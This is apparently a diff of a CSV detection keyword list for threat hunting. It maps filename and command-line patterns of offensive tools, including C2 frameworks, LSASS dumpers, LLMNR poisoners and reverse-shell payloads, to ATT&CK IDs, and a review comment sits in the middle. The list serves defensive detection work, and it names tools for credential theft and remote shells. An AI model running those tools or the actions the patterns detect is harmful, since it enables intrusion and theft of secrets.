-"*remove-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
-"*Remove-Persistence.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
-"*remove-persistence-cron*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
-"*Remove-PoshRat*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*RemoveKeePassTrigger.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*RemoveKeePassTrigger.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*remove-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Remove-Persistence.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*remove-persistence-cron*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Remove-PoshRat*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
 "*removeRegTrace*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z"
-"*Remove-Update.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
-"*Remove-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Remove-Update.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Remove-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
 "*renameMachine.py -current-name * -new-name * -dc-ip * *:*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*renameMachine.py -current-name * -new-name*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1078.001 - T1078.002 - T1059.003 - T1059.001 - T1053.005 - T1021.001 - T1003.001 - T1003.002 - T1003.004 - T1001.001 ","TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*replace_key_iv_shellcode*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z"
-"*replace_video_fake_plugin*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*replace_video_fake_plugin*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
 "*RequestAsPython-PowerShell.py*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite. the request gets transformed to its equivalent in Python requests. Python urllib2. and PowerShell Invoke-WebRequest.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z"
 "*reshacker_setup.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
 "*ResourceDevelopment_EstablishAccounts_RGPerson.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
@@ -15808,23 +15988,24 @@ "*ResourceDevelopment_WebServices_TencentAPIGateway.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Resources/Design/NinjaStyle.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Resources/drone.dll*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*Resources\donut.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*responder * --lm*","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*responder -i *","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*Resources\donut.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*responder * --lm*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*responder -i *","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*responder --interface*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Responder.py*","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*Responder.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*Responder/tools/MultiRelay/bin/Runas.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Responder/tools/MultiRelay/bin/Syssvc.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*responder-http-off*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*responder-http-on*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive 
tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Responder-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*Responder-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*responder-smb-off*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*responder-smb-on*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Responder-Windows*","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*RestartKeePass.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*restic2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Responder-Windows*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*RestartKeePass.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*RestartKeePass.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*restic2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*restore_signature.sh *.dmp*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*RestrictedAdmin.exe*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","855","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" +"*RestrictedAdmin.exe*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","857","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" "*return-wizard-rce-exim.txt*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*rev_kali_192_168_0_110_1234*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*reveng007/C2_Server*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 
","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" 
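Review bot: The added NetExec row reuses the keyword `*RestartKeePass.ps1*` already carried by the crackmapexec row directly above it, and the two rows disagree on `metadata_severity_score` (`N/A` on crackmapexec, `10` on NetExec). A consumer that loads this CSV as a keyword-keyed lookup may alert twice on one event or keep only one of the rows, so the severity an analyst sees would depend on parser behaviour. If the duplicate is intentional because the script ships in both projects, record that in `metadata_comment` (for example `"same script also shipped in CrackMapExec"`) and give both rows the same severity. The new row is also filed under category `Credential Access`, but its tactics field `"TA0007 - TA0003 - TA0002 - TA0001"` omits TA0006 and its techniques list has no credential-store technique. Adding `TA0006` (and `T1555.005`, if the maintainers agree with that mapping) would keep ATT&CK-based filtering consistent with the category.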
@@ -15833,82 +16014,82 @@ "*reveng007/ReflectiveNtdll*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*reveng007/SharpGmailC2*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*reverse_shell_minified.js*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" -"*reverse_tcp_x64.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*reverse_win_http.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*reverse_tcp_x64.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
